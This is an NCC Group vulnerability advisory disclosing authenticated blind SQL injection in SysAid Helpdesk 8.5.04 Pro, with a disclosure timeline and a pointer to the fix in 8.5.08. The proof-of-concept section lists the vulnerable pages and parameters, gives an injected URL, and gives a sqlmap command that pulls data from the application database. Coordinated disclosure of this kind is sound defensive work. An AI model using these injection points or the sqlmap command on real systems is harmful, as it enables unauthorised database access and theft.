Summary

Name: SysAid Helpdesk Pro – Blind SQL Injection
Release Date: 30 November 2012
Reference: NGS00241
Discoverer: Daniel Compton
Vendor: SysAid
Vendor Reference:
Systems Affected: SysAid Helpdesk 8.5 Pro
Risk: High
Status: Published

TimeLine

Discovered: 12 March 2012
Released: 12 March 2012
Approved: 12 March 2012
Reported: 14 March 2012
Fixed: 1 August 2012
Published: 30 November 2012

Description

SysAid Helpdesk V8.5.04 Pro Edition – Blind SQL Injection within the administrator interface. This is a commercial product.

I. VULNERABILITY

SysAid Helpdesk V8.5.04 Pro suffers from Blind SQL injection several pages and parameters. This is exploitable as an authenticated user of the admin interface.

II. BACKGROUND

SyAid is a fully web based helpdesk solution.

https://www.sysaid.com/

III. DESCRIPTION

SQL injection has been found and exploited/confirmed within the software as an authenticated user. This is the latest version of SysAid Helpdesk.

Technical Details

IV. PROOF OF CONCEPT

The following URL and parameters have been confirmed to suffer from Blind SQL injection.

/AssetManagementList.jsp (GET Parameter: computerID, group1)
AssetManagementChart.jsp (GET Parameter: group1)
/genericreport (POST Parameter: assetID, customSQL, groupFilter)
CIEdit.jsp (POST Parameter: newClcleared, paelBtnArrayButtons)

/AssetManagementList.jsp?resetParams=YES noframe=YES group1= group1Name=computer_type group2= group2Name=null computerID=null' viewName=Servers%20and%20Network%20devices

python sqlmap.py

--url="http://192.168.1.149:8080/AssetManagementList.jsp?resetParams=YES noframe=YES group1= group1Name=computer_type group2= group2Name=null computerID=null viewName=Servers%20and%20Network%20devices"--dbms=mysql -p computerID--cookie="JSESSIONID=1CDC74FF018EE7C2C0CDD3FE54DB79F2" -D ilient --level=5

Fix Information

Fixed in version 8.5.08

http://www.sysaid.com/bugs-fixed-8-5.htm#8508

Download Product Patch:

http://cdn3.sysaid.com/SysAidServerPatchFreev8.5.08.exe

NCC Group Publication Archive